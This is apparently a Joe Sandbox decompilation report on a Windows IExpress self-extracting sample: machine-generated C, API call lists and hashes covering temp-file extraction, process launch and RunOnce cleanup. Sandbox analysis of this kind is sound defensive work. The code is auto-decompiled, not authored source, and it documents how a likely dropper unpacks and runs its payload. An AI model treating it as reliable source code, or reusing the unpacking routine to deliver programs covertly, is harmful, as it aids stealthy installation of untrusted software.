                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				signed int _t58;
                                                          				signed int _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				E01097155();
                                                          				_push(0x58);
                                                          				_push(0x10972b8);
                                                          				E01097208(__ebx, __edi, __esi);
                                                          				 *(_t62 - 0x20) = 0;
                                                          				GetStartupInfoW(_t62 - 0x68);
                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                          				_t53 = 0;
                                                          				while(1) {
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					if(0 == 0) {
                                                          						break;
                                                          					}
                                                          					if(0 != _t56) {
                                                          						Sleep(0x3e8);
                                                          						continue;
                                                          					} else {
                                                          						_t58 = 1;
                                                          						_t53 = 1;
                                                          					}
                                                          					L7:
                                                          					_t67 =  *0x10988b0 - _t58; // 0x2
                                                          					if(_t67 != 0) {
                                                          						__eflags =  *0x10988b0; // 0x2
                                                          						if(__eflags != 0) {
                                                          							 *0x10981e4 = _t58;
                                                          							goto L13;
                                                          						} else {
                                                          							 *0x10988b0 = _t58;
                                                          							_t37 = E01096C3F(0x10910b8, 0x10910c4); // executed
                                                          							__eflags = _t37;
                                                          							if(__eflags == 0) {
                                                          								goto L13;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          								_t30 = 0xff;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_push(0x1f);
                                                          						L01096FF4();
                                                          						L13:
                                                          						_t68 =  *0x10988b0 - _t58; // 0x2
                                                          						if(_t68 == 0) {
                                                          							_push(0x10910b4);
                                                          							_push(0x10910ac);
                                                          							L01097202();
                                                          							 *0x10988b0 = 2;
                                                          						}
                                                          						if(_t53 == 0) {
                                                          							 *0x10988ac = 0;
                                                          						}
                                                          						_t71 =  *0x10988b4;
                                                          						if( *0x10988b4 != 0 && E01097060(_t71, 0x10988b4) != 0) {
                                                          							_t60 =  *0x10988b4; // 0x0
                                                          							 *0x109a288(0, 2, 0);
                                                          							 *_t60();
                                                          						}
                                                          						_t25 = __imp___acmdln; // 0x76665b9c
                                                          						_t59 =  *_t25;
                                                          						 *(_t62 - 0x1c) = _t59;
                                                          						_t54 =  *(_t62 - 0x20);
                                                          						while(1) {
                                                          							_t41 =  *_t59;
                                                          							if(_t41 > 0x20) {
                                                          								goto L32;
                                                          							}
                                                          							if(_t41 != 0) {
                                                          								if(_t54 != 0) {
                                                          									goto L32;
                                                          								} else {
                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                          										_t59 = _t59 + 1;
                                                          										 *(_t62 - 0x1c) = _t59;
                                                          										_t41 =  *_t59;
                                                          									}
                                                          								}
                                                          							}
                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                          								_t29 = 0xa;
                                                          							} else {
                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                          							}
                                                          							_push(_t29);
                                                          							_t30 = E01092BFB(0x1090000, 0, _t59); // executed
                                                          							 *0x10981e0 = _t30;
                                                          							__eflags =  *0x10981f8;
                                                          							if( *0x10981f8 == 0) {
                                                          								exit(_t30); // executed
                                                          								goto L32;
                                                          							}
                                                          							__eflags =  *0x10981e4;
                                                          							if( *0x10981e4 == 0) {
                                                          								__imp___cexit();
                                                          								_t30 =  *0x10981e0; // 0x0
                                                          							}
                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          							goto L40;
                                                          							L32:
                                                          							__eflags = _t41 - 0x22;
                                                          							if(_t41 == 0x22) {
                                                          								__eflags = _t54;
                                                          								_t15 = _t54 == 0;
                                                          								__eflags = _t15;
                                                          								_t54 = 0 | _t15;
                                                          								 *(_t62 - 0x20) = _t54;
                                                          							}
                                                          							_t26 = _t41 & 0x000000ff;
                                                          							__imp___ismbblead(_t26);
                                                          							__eflags = _t26;
                                                          							if(_t26 != 0) {
                                                          								_t59 = _t59 + 1;
                                                          								__eflags = _t59;
                                                          								 *(_t62 - 0x1c) = _t59;
                                                          							}
                                                          							_t59 = _t59 + 1;
                                                          							 *(_t62 - 0x1c) = _t59;
                                                          						}
                                                          					}
                                                          					L40:
                                                          					return E0109724D(_t30);
                                                          				}
                                                          				_t58 = 1;
                                                          				__eflags = 1;
                                                          				goto L7;
                                                          			}


















                                                          0x01096b98
                                                          0x01096ba2
                                                          0x01096b9a
                                                          0x01096b9a
                                                          0x01096b9a
                                                          0x01096ba3
                                                          0x01096bab
                                                          0x01096bb0
                                                          0x01096bb5
                                                          0x01096bbc
                                                          0x01096bbf
                                                          0x00000000
                                                          0x01096bbf
                                                          0x01096c1e
                                                          0x01096c25
                                                          0x01096c27
                                                          0x01096c2d
                                                          0x01096c2d
                                                          0x01096c32
                                                          0x00000000
                                                          0x01096bc5
                                                          0x01096bc5
                                                          0x01096bc8
                                                          0x01096bcc
                                                          0x01096bce
                                                          0x01096bce
                                                          0x01096bd1
                                                          0x01096bd3
                                                          0x01096bd3
                                                          0x01096bd6
                                                          0x01096bda
                                                          0x01096be1
                                                          0x01096be3
                                                          0x01096be5
                                                          0x01096be5
                                                          0x01096be6
                                                          0x01096be6
                                                          0x01096be9
                                                          0x01096bea
                                                          0x01096bea
                                                          0x01096b74
                                                          0x01096c39
                                                          0x01096c3e
                                                          0x01096c3e
                                                          0x01096abe
                                                          0x01096abe
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 01097155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01097182
                                                            • Part of subcall function 01097155: GetCurrentProcessId.KERNEL32 ref: 01097191
                                                            • Part of subcall function 01097155: GetCurrentThreadId.KERNEL32 ref: 0109719A
                                                            • Part of subcall function 01097155: GetTickCount.KERNEL32 ref: 010971A3
                                                            • Part of subcall function 01097155: QueryPerformanceCounter.KERNEL32(?), ref: 010971B8
                                                          • GetStartupInfoW.KERNEL32(?,010972B8,00000058), ref: 01096A7F
                                                          • Sleep.KERNEL32(000003E8), ref: 01096AB4
                                                          • _amsg_exit.MSVCRT ref: 01096AC9
                                                          • _initterm.MSVCRT ref: 01096B1D
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 01096B49
                                                          • exit.KERNELBASE ref: 01096BBF
                                                          • _ismbblead.MSVCRT ref: 01096BDA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 836923961-0
                                                          • Opcode ID: 3f959237a13625c10e51356f420cd098d729e8961de9430418f59b35915b8ff2
                                                          • Instruction ID: 9b89dc14aefb3488861c7ca12d1b21f225ac2d2bdfdae55941ee424a3452d795
                                                          • Opcode Fuzzy Hash: 3f959237a13625c10e51356f420cd098d729e8961de9430418f59b35915b8ff2
                                                          • Instruction Fuzzy Hash: 2F410371A04229CBDF619B6DD8347AE7BE4BB45720F10805BE9C1D7384DB7B4480AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 10958c8-10958d5 588 10958d8-10958dd 587->588 588->588 589 10958df-10958f1 LocalAlloc 588->589 590 1095919-1095959 call 1091680 call 109658a CreateFileA LocalFree 589->590 591 10958f3-1095901 call 10944b9 589->591 595 1095906-1095910 call 1096285 590->595 600 109595b-109596c CloseHandle GetFileAttributesA 590->600 591->595 601 1095912-1095918 595->601 600->595 602 109596e-1095970 600->602 602->595 603 1095972-109597b 602->603 603->601
                                                          C-Code - Quality: 95%
                                                          			E010958C8(intOrPtr* __ecx) {
                                                          				void* _v8;
                                                          				intOrPtr _t6;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          				signed char _t16;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				intOrPtr* _t27;
                                                          				CHAR* _t33;
                                                          
                                                          				_push(__ecx);
                                                          				_t33 = __ecx;
                                                          				_t27 = __ecx;
                                                          				_t23 = __ecx + 1;
                                                          				do {
                                                          					_t6 =  *_t27;
                                                          					_t27 = _t27 + 1;
                                                          				} while (_t6 != 0);
                                                          				_t36 = _t27 - _t23 + 0x14;
                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                          				if(_t20 != 0) {
                                                          					E01091680(_t20, _t36, _t33);
                                                          					E0109658A(_t20, _t36, "TMP4351$.TMP");
                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                          					_v8 = _t10;
                                                          					LocalFree(_t20);
                                                          					_t12 = _v8;
                                                          					if(_t12 == 0xffffffff) {
                                                          						goto L4;
                                                          					} else {
                                                          						CloseHandle(_t12);
                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							 *0x1099124 = 0;
                                                          							_t14 = 1;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					L4:
                                                          					 *0x1099124 = E01096285();
                                                          					_t14 = 0;
                                                          				}
                                                          				return _t14;
                                                          			}


                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010958E7
                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095943
                                                          • LocalFree.KERNEL32(00000000,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109594D
                                                          • CloseHandle.KERNEL32(00000000,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109595C
                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095963
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                          • API String ID: 747627703-1860564779
                                                          • Opcode ID: 4b76299d49bdcde422c31beaf363b594963bedc375d671e6e66acbace14d582c
                                                          • Instruction ID: 74be7bc4c0f09bef231b3ccff123f24a2388f8887712553d7c4837850b745649
                                                          • Opcode Fuzzy Hash: 4b76299d49bdcde422c31beaf363b594963bedc375d671e6e66acbace14d582c
                                                          • Instruction Fuzzy Hash: F611387170021167EF301E7E6C2CA9B7E9DEF86270B00465AF5C5D31C4CA75980693A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 631 1093fef-1094010 632 109410a-109411a call 1096ce0 631->632 633 1094016-109403b CreateProcessA 631->633 634 1094041-109406e WaitForSingleObject GetExitCodeProcess 633->634 635 10940c4-1094101 call 1096285 GetLastError FormatMessageA call 10944b9 633->635 637 1094091 call 109411b 634->637 638 1094070-1094077 634->638 647 1094106 635->647 645 1094096-10940b8 CloseHandle * 2 637->645 638->637 641 1094079-109407b 638->641 641->637 644 109407d-1094089 641->644 644->637 648 109408b 644->648 649 1094108 645->649 650 10940ba-10940c0 645->650 647->649 648->637 649->632 650->649 651 10940c2 650->651 651->647
                                                          C-Code - Quality: 84%
                                                          			E01093FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                          				signed int _v8;
                                                          				char _v524;
                                                          				long _v528;
                                                          				struct _PROCESS_INFORMATION _v544;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t20;
                                                          				void* _t22;
                                                          				int _t25;
                                                          				intOrPtr* _t39;
                                                          				signed int _t44;
                                                          				void* _t49;
                                                          				signed int _t50;
                                                          				intOrPtr _t53;
                                                          
                                                          				_t45 = __edx;
                                                          				_t20 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t20 ^ _t50;
                                                          				_t39 = __ecx;
                                                          				_t49 = 1;
                                                          				_t22 = 0;
                                                          				if(__ecx == 0) {
                                                          					L13:
                                                          					return E01096CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                          				}
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                          				if(_t25 == 0) {
                                                          					 *0x1099124 = E01096285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                          					_t45 = 0x4c4;
                                                          					E010944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                          					L11:
                                                          					_t49 = 0;
                                                          					L12:
                                                          					_t22 = _t49;
                                                          					goto L13;
                                                          				}
                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                          				_t44 = _v528;
                                                          				_t53 =  *0x1098a28; // 0x0
                                                          				if(_t53 == 0) {
                                                          					_t34 =  *0x1099a2c; // 0x0
                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                          						_t34 = _t44 & 0xff000000;
                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                          							 *0x1099a2c = _t44;
                                                          						}
                                                          					}
                                                          				}
                                                          				E0109411B(_t34, _t44);
                                                          				CloseHandle(_v544.hThread);
                                                          				CloseHandle(_v544);
                                                          				if(( *0x1099a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					goto L11;
                                                          				}
                                                          			}


                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01094033
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01094049
                                                          • GetExitCodeProcess.KERNELBASE ref: 0109405C
                                                          • CloseHandle.KERNEL32(?), ref: 0109409C
                                                          • CloseHandle.KERNEL32(?), ref: 010940A8
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010940DC
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010940E9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-0
                                                          • Opcode ID: 4dd03a9d04f20908b1d17fa073730f42533f0fa93e10e9b4f634806217f7a968
                                                          • Instruction ID: 05a7396133d80d573a1e6741f1b6d13273a62868453e53bd51a22a9de6c993ca
                                                          • Opcode Fuzzy Hash: 4dd03a9d04f20908b1d17fa073730f42533f0fa93e10e9b4f634806217f7a968
                                                          • Instruction Fuzzy Hash: F431B171740208ABEF709B69DD68FAB77B8FBD4700F1001AAF585D2155CA3A4C82DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 652 10951e5-109520b call 109468f LocalAlloc 655 109522d-109523c call 109468f 652->655 656 109520d-1095228 call 10944b9 call 1096285 652->656 662 109523e-1095260 call 10944b9 LocalFree 655->662 663 1095262-1095270 lstrcmpA 655->663 669 10952b0 656->669 662->669 666 109527e-109529c call 10944b9 LocalFree 663->666 667 1095272-1095273 LocalFree 663->667 674 109529e-10952a4 666->674 675 10952a6 666->675 671 1095279-109527c 667->671 673 10952b2-10952b5 669->673 671->673 674->671 675->669
                                                          C-Code - Quality: 100%
                                                          			E010951E5(void* __eflags) {
                                                          				int _t5;
                                                          				void* _t6;
                                                          				void* _t28;
                                                          
                                                          				_t1 = E0109468F("UPROMPT", 0, 0) + 1; // 0x1
                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                          				if(_t28 != 0) {
                                                          					if(E0109468F("UPROMPT", _t28, _t29) != 0) {
                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                          						if(_t5 != 0) {
                                                          							_t6 = E010944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                          							LocalFree(_t28);
                                                          							if(_t6 != 6) {
                                                          								 *0x1099124 = 0x800704c7;
                                                          								L10:
                                                          								return 0;
                                                          							}
                                                          							 *0x1099124 = 0;
                                                          							L6:
                                                          							return 1;
                                                          						}
                                                          						LocalFree(_t28);
                                                          						goto L6;
                                                          					}
                                                          					E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree(_t28);
                                                          					 *0x1099124 = 0x80070714;
                                                          					goto L10;
                                                          				}
                                                          				E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x1099124 = E01096285();
                                                          				goto L10;
                                                          			}







                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F4D,?,00000002,00000000), ref: 01095201
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01095250
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$UPROMPT
                                                          • API String ID: 957408736-2980973527
                                                          • Opcode ID: d22399dab0f40a000b1a20080f711ad7ea6e8c6ce202d598b868a6b9534c02df
                                                          • Instruction ID: f12e2b7ffdfd1b2da10943b958b065ce7a4fa2d2dceb5337238a710e86ead020
                                                          • Opcode Fuzzy Hash: d22399dab0f40a000b1a20080f711ad7ea6e8c6ce202d598b868a6b9534c02df
                                                          • Instruction Fuzzy Hash: CD11E6F1300201ABDF266B765D78B7F61DDFBCA394B00406EB6C2D6184DA7E88016224
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E010952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t9;
                                                          				signed int _t11;
                                                          				void* _t21;
                                                          				void* _t29;
                                                          				CHAR** _t31;
                                                          				void* _t32;
                                                          				signed int _t33;
                                                          
                                                          				_t28 = __edi;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t33;
                                                          				_push(__esi);
                                                          				_t31 =  *0x10991e0; // 0xd18308
                                                          				if(_t31 != 0) {
                                                          					_push(__edi);
                                                          					do {
                                                          						_t29 = _t31;
                                                          						if( *0x1098a24 == 0 &&  *0x1099a30 == 0) {
                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                          							DeleteFileA( *_t31); // executed
                                                          						}
                                                          						_t31 = _t31[1];
                                                          						LocalFree( *_t29);
                                                          						LocalFree(_t29);
                                                          					} while (_t31 != 0);
                                                          					_pop(_t28);
                                                          				}
                                                          				_t11 =  *0x1098a20; // 0x0
                                                          				_pop(_t32);
                                                          				if(_t11 != 0 &&  *0x1098a24 == 0 &&  *0x1099a30 == 0) {
                                                          					_push(_t22);
                                                          					E01091781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          					if(( *0x1099a34 & 0x00000020) != 0) {
                                                          						E010965E8( &_v268);
                                                          					}
                                                          					SetCurrentDirectoryA(".."); // executed
                                                          					_t22 =  &_v268;
                                                          					E01092390( &_v268);
                                                          					_t11 =  *0x1098a20; // 0x0
                                                          				}
                                                          				if( *0x1099a40 != 1 && _t11 != 0) {
                                                          					_t11 = E01091FE1(_t22); // executed
                                                          				}
                                                          				 *0x1098a20 =  *0x1098a20 & 0x00000000;
                                                          				return E01096CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                          			}













                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00D18308,00000080,?,00000000), ref: 010952F2
                                                          • DeleteFileA.KERNELBASE(00D18308), ref: 010952FA
                                                          • LocalFree.KERNEL32(00D18308,?,00000000), ref: 01095305
                                                          • LocalFree.KERNEL32(00D18308), ref: 0109530C
                                                          • SetCurrentDirectoryA.KERNELBASE(010911FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 01095363
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01095334
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                          • API String ID: 2833751637-2356899610
                                                          • Opcode ID: 6f64aa27485c22622653065b12671c8cfcf780fc36eeab12d4caed2b53b9e242
                                                          • Instruction ID: 5504c49e3a683b529fd8782b10988ff566fa0749dda8d3681ec3ab875a2d47a5
                                                          • Opcode Fuzzy Hash: 6f64aa27485c22622653065b12671c8cfcf780fc36eeab12d4caed2b53b9e242
                                                          • Instruction Fuzzy Hash: 87218031600209DBEF729B25D83976977A0FB44714F04819EE9C657298CBBE5984EB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01091FE1(void* __ecx) {
                                                          				void* _v8;
                                                          				long _t4;
                                                          
                                                          				if( *0x1098530 != 0) {
                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                          					if(_t4 == 0) {
                                                          						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                          						return RegCloseKey(_v8);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}






                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0109538C,?,?,0109538C), ref: 01092005
                                                          • RegDeleteValueA.KERNELBASE(0109538C,wextract_cleanup1,?,?,0109538C), ref: 01092017
                                                          • RegCloseKey.ADVAPI32(0109538C,?,?,0109538C), ref: 01092020
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                          • API String ID: 849931509-1592051331
                                                          • Opcode ID: bdbea3748939c35b42a3e55dbe58f069a3724e8758fa9bb97ccc05f8c9313815
                                                          • Instruction ID: edabf481fa78a8d51bc6fdd7d030419d742362d171054feae4ef2efad7c53d52
                                                          • Opcode Fuzzy Hash: bdbea3748939c35b42a3e55dbe58f069a3724e8758fa9bb97ccc05f8c9313815
                                                          • Instruction Fuzzy Hash: 68E04F30650318FBEF318A91EC2EF6D7B6AF781780F10019ABA84A1155E7665A14E704
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E01094CD0(char* __edx, long _a4, int _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				long _t32;
                                                          				signed int _t33;
                                                          				long _t35;
                                                          				long _t36;
                                                          				struct HWND__* _t37;
                                                          				long _t38;
                                                          				long _t39;
                                                          				long _t41;
                                                          				long _t44;
                                                          				long _t45;
                                                          				long _t46;
                                                          				signed int _t50;
                                                          				long _t51;
                                                          				char* _t58;
                                                          				long _t59;
                                                          				char* _t63;
                                                          				long _t64;
                                                          				CHAR* _t71;
                                                          				CHAR* _t74;
                                                          				int _t75;
                                                          				signed int _t76;
                                                          
                                                          				_t69 = __edx;
                                                          				_t29 =  *0x1098004; // 0x8a9c601
                                                          				_t30 = _t29 ^ _t76;
                                                          				_v8 = _t30;
                                                          				_t75 = _a8;
